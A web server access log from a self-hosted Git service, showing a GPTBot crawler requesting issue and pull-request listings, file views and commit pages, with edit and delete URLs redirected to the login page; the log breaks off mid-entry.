git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:04:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:04:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:04:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:04:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:04:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:04:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:04:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:04:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:04:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10237] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:04:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:04:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:04:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:04:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:04:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:04:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:19:04:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:19:04:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 11413] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old" -[17/Feb/2026:19:04:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:19:04:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:19:04:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:19:04:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:19:04:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11086] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:19:04:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 10148] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&state=all&type=all" -[17/Feb/2026:19:04:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:04:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:04:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:04:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9977] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?project=-1&state=open&type=all" -[17/Feb/2026:19:04:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9969] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&state=all&type=all" -[17/Feb/2026:19:04:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10164] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=oldest&state=open&type=all" -[17/Feb/2026:19:04:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:19:04:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:19:04:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:19:04:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:19:04:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 9876] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:19:04:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/dummy.cpp?display=source" [Client 74.7.227.38] [Length 11432] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:19:04:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 997] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:19:04:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:19:04:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 10451] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:19:04:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10144] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:04:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=open&type=all" -[17/Feb/2026:19:04:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" -[17/Feb/2026:19:04:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=open&type=all" -[17/Feb/2026:19:04:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:04:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:04:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:04:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:04:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?files=PostgresMonitor%2fbuild%2fPostgresWatchdog" [Client 74.7.227.38] [Length 30629] [Gzip 7.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:19:04:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?files=PostgresMonitor%2fbuild%2fPostgresWatchdog" [Client 74.7.227.38] [Length 65174] [Gzip 15.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:19:04:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:19:04:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:19:04:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/src-old/dummy.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:19:04:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:19:04:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/libstdc++-6.dll?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libstdc++-6.dll" -[17/Feb/2026:19:04:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:19:04:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:04:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:04:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:19:04:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9972] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:19:04:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 